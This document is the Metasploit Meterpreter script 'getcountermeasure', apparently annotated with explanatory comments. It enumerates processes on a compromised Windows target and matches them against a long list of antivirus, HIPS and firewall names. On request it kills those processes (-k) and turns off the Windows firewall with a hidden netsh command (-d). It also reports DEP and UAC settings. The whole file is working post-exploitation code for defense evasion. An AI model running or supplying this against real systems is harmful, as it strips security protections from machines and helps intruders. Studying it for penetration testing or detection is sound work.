##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
#
# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
# Also provides the option to kill the processes of detected products and to disable the built-in firewall.
# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
# Version: 0.1.0
# `client` is the Meterpreter session this script was launched against; the
# helpers below receive it explicitly as `session` instead of using the global.
session = client
# Command-line switches understood by the script (parsed in the MAIN section).
# The leading `false` in each entry means the switch takes no value.
# Without -k or -d the script only reads and reports: it neither terminates
# processes nor changes the firewall state.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
  "-d" => [ false, "Disable built in Firewall" ]
)
# Print the three-line description followed by the generated option table,
# then stop the script by raising Rex::Script::Completed (never returns).
def usage
  banner = [
    "Getcountermeasure -- List (or optionally, kill) HIPS and AV",
    "processes, show XP firewall rules, and display DEP and UAC",
    "policies"
  ]
  banner.each { |line| print_line(line) }
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end
#-------------------------------------------------------------------------------
# Image names (lowercase, whitespace-delimited) that `check` treats as
# anti-virus, HIPS or third-party firewall products. The comparison made
# against running processes is an exact string match on the image name, so
# entries without ".exe" ("avktray", "avkwctl") only match a process of
# exactly that name. %w splits on any whitespace, so an entry containing a
# space becomes two separate tokens; duplicates are kept as written.
avs = %w[
  a2adguard.exe a2adwizard.exe a2antidialer.exe a2cfg.exe a2cmd.exe
  a2free.exe a2guard.exe a2hijackfree.exe a2scan.exe a2service.exe
  a2start.exe a2sys.exe a2upd.exe aavgapi.exe aawservice.exe
  aawtray.exe ad-aware.exe ad-watch.exe alescan.exe anvir.exe
  ashdisp.exe ashmaisv.exe ashserv.exe ashwebsv.exe aswupdsv.exe
  atrack.exe avgagent.exe avgamsvr.exe avgcc.exe avgctrl.exe
  avgemc.exe avgnt.exe avgtcpsv.exe avguard.exe avgupsvc.exe
  avgw.exe avkbar.exe avk.exe avkpop.exe avkproxy.exe
  avkservice.exe avktray avktray.exe avkwctl avkwctl.exe
  avmailc.exe avp.exe avpm.exe avpmwrap.exe avsched32.exe
  avwebgrd.exe avwin.exe avwupsrv.exe avz.exe bdagent.exe
  bdmcon.exe bdnagent.exe bdss.exe bdswitch.exe blackd.exe
  blackice.exe blink.exe boc412.exe boc425.exe bocore.exe
  bootwarn.exe cavrid.exe cavtray.exe ccapp.exe ccevtmgr.exe
  ccimscan.exe ccproxy.exe ccpwdsvc.exe ccpxysvc.exe ccsetmgr.exe
  cfgwiz.exe cfp.exe clamd.exe clamservice.exe clamtray.exe
  cmdagent.exe cpd.exe cpf.exe csinsmnt.exe dcsuserprot.exe
  defensewall.exe defensewall_serv.exe defwatch.exe f-agnt95.exe fpavupdm.exe
  f-prot95.exe f-prot.exe fprot.exe fsaua.exe fsav32.exe
  f-sched.exe fsdfwd.exe fsm32.exe fsma32.exe fssm32.exe
  f-stopw.exe f-stopw.exe fwservice.exe fwsrv.exe iamstats.exe
  iao.exe icload95.exe icmon.exe idsinst.exe idslu.exe
  inetupd.exe irsetup.exe isafe.exe isignup.exe issvc.exe
  kav.exe kavss.exe kavsvc.exe klswd.exe kpf4gui.exe
  kpf4ss.exe livesrv.exe lpfw.exe mcagent.exe mcdetect.exe
  mcmnhdlr.exe mcrdsvc.exe mcshield.exe mctskshd.exe mcvsshld.exe
  mghtml.exe mpftray.exe msascui.exe mscifapp.exe msfwsvc.exe
  msgsys.exe msssrv.exe navapsvc.exe navapw32.exe navlogon.dll
  navstub.exe navw32.exe nisemsvr.exe nisum.exe nmain.exe
  noads.exe nod32krn.exe nod32kui.exe nod32ra.exe npfmntor.exe
  nprotect.exe nsmdtr.exe oasclnt.exe ofcdog.exe opscan.exe
  ossec-agent.exe outpost.exe paamsrv.exe pavfnsvr.exe pcclient.exe
  pccpfw.exe pccwin98.exe persfw.exe protector.exe qconsole.exe
  qdcsfs.exe rtvscan.exe sadblock.exe safe.exe sandboxieserver.exe
  savscan.exe sbiectrl.exe sbiesvc.exe sbserv.exe scfservice.exe
  sched.exe schedm.exe scheduler daemon.exe sdhelp.exe serv95.exe
  sgbhp.exe sgmain.exe slee503.exe smartfix.exe smc.exe
  snoopfreesvc.exe snoopfreeui.exe spbbcsvc.exe sp_rsser.exe spyblocker.exe
  spybotsd.exe spysweeper.exe spysweeperui.exe spywareguard.dll spywareterminatorshield.exe
  ssu.exe steganos5.exe stinger.exe swdoctor.exe swupdate.exe
  symlcsvc.exe symundo.exe symwsc.exe symwscno.exe tcguard.exe
  tds2-98.exe tds-3.exe teatimer.exe tgbbob.exe tgbstarter.exe
  tsatudt.exe umxagent.exe umxcfg.exe umxfwhlp.exe umxlu.exe
  umxpol.exe umxtray.exe usrprmpt.exe vetmsg9x.exe vetmsg.exe
  vptray.exe vsaccess.exe vsserv.exe wcantispy.exe win-bugsfix.exe
  winpatrol.exe winpatrolex.exe wrsssdk.exe xcommsvr.exe xfr.exe
  xp-antispy.exe zegarynka.exe zlclient.exe
]
#-------------------------------------------------------------------------------
# Check for the presence of AV, HIPS and Third Party firewall and/or kill the
# processes associated with it
#
# session - Meterpreter session (uses sys.process)
# avs     - list of lowercase image names regarded as security products
# killbit - when truthy, each matching process is terminated by pid (-k)
#
# Detection is an exact, case-insensitive comparison of the process image
# name against `avs`; the path is printed but not checked. `Array#index`
# returns 0 for the first entry, which is truthy in Ruby, so the first list
# entry matches like any other.
def check(session,avs,killbit)
  print_status("Checking for contermeasures...")
  # Enumerates every process on the target, then one list lookup per process.
  session.sys.process.get_processes().each do |x|
    if (avs.index(x['name'].downcase))
      print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
      if (killbit)
        # Destructive step (-k only). The return value of kill is ignored and
        # there is no rescue, so whether a failed kill is surfaced depends on
        # whether the API raises — confirm against the process API.
        print_status("\tKilling process for countermeasure.....")
        session.sys.process.kill(x['pid'])
      end
    end
  end
end
#-------------------------------------------------------------------------------
# Get the configuration and/or disable the built in Windows Firewall
#
# session - Meterpreter session (uses sys.process)
# killfw  - when truthy, the firewall is switched off after being displayed (-d)
#
# Both steps shell out to the legacy `netsh firewall` context (the XP-era
# interface the usage text refers to) through a hidden, channelized cmd.exe
# and read stdout back over the channel.
def checklocalfw(session,killfw)
  print_status("Getting Windows Built in Firewall configuration...")
  opmode = ""
  # NOTE(review): 'Hidden' is passed as the string 'true' here but as a
  # boolean in checkdep — presumably both are accepted; confirm against execute.
  r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
  # Drain the channel until read returns nil.
  while(d = r.channel.read)
    opmode << d
  end
  r.channel.close
  r.close
  # Echo each line of the netsh output, indented.
  opmode.split("\n").each do |o|
    print_status("\t#{o}")
  end
  if (killfw)
    # Destructive step (-d only): disables the host firewall system-wide.
    # Only the English elevation-denied message is recognised, and it is
    # matched per read chunk, so a message split across two reads or any
    # other failure text goes unreported; success is not confirmed either.
    print_status("Disabling Built in Firewall.....")
    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
    while(d = f.channel.read)
      if d =~ /The requested operation requires elevation./
        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
      end
    end
    f.channel.close
    f.close
  end
end
#-------------------------------------------------------------------------------
# Function for getting the current DEP Policy on the Windows Target
#
# session - Meterpreter session (uses sys.config and sys.process)
#
# Runs `wmic OS Get DataExecutionPrevention_SupportPolicy` with /append into a
# file under %TEMP%, types the file back over a channel, then deletes it.
# That is three cmd.exe launches plus a short-lived file on the target, all
# observable from the host side. Prints nothing if no branch below matches.
def checkdep(session)
  tmpout = ""
  depmode = ""
  # Expand environment %TEMP% variable
  tmp = session.sys.config.getenv('TEMP')
  # Create random name for the wmic output (zero-padded 5-digit number)
  wmicfile = sprintf("%.5d",rand(100000))
  wmicout = "#{tmp}\\#{wmicfile}"
  print_status("Checking DEP Support Policy...")
  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
  # Fixed delay rather than waiting on the process: assumes wmic finishes
  # within two seconds, otherwise the read below sees partial or no output.
  sleep(2)
  r.close
  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
  while(d = r.channel.read)
    tmpout << d
  end
  r.channel.close
  r.close
  # Best-effort cleanup of the temp file; result is not checked.
  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
  # scan with a capture group yields an array of one-element arrays, e.g.
  # [["2"]]. Under Ruby 1.8 Array#to_s joined the elements ("2"); from 1.9
  # on it returns the inspect form ('[["2"]]'), so none of the comparisons
  # below hold and nothing is printed — presumably written against 1.8.
  depmode = tmpout.scan(/(\d)/)
  if depmode.to_s == "0"
    print_status("\tDEP is off for the whole system.")
  elsif depmode.to_s == "1"
    print_status("\tFull DEP coverage for the whole system with no exceptions.")
  elsif depmode.to_s == "2"
    print_status("\tDEP is limited to Windows system binaries.")
  elsif depmode.to_s == "3"
    print_status("\tDEP is on for all programs and services.")
  end

end
#-------------------------------------------------------------------------------
# Report whether UAC is enabled by reading EnableLUA from
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (read-only
# registry access). Only data == 1 counts as enabled; anything else, including
# an unexpected type, prints "Disabled". A missing key or value is not handled.
#
# session - Meterpreter session (uses sys.registry)
def checkuac(session)
  print_status("Checking if UAC is enabled ...")
  hive, subkey = session.sys.registry.splitkey('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
  lua = session.sys.registry.open_key(hive, subkey, KEY_READ).query_value("EnableLUA")
  state = lua.data == 1 ? "Enabled" : "Disabled"
  print_status("\tUAC is #{state}")
end
################## MAIN ##################
# Both destructive actions are opt-in flags; with no switches the script
# only enumerates and reports.
killbt = false
killfw = false
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-k"
    killbt = true
  when "-d"
    killfw = true
  when "-h"
    usage # raises Rex::Script::Completed, so nothing below runs
  end
}
# get the version of windows
if client.platform == 'windows'
  # sysinfo["OS"] is presumably a free-form product string; the version
  # checks below are substring matches on it.
  wnvr = session.sys.config.sysinfo["OS"]
  print_status("Running Getcountermeasure on the target...")
  check(session,avs,killbt)
  # The netsh firewall and wmic DEP queries are skipped on Windows 2000.
  if wnvr !~ /Windows 2000/
    checklocalfw(session, killfw)
    checkdep(session)
  end
  # UAC is only checked when the OS string contains "Windows Vista"; later
  # releases never reach checkuac.
  if wnvr =~ /Windows Vista/
    checkuac(session)
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end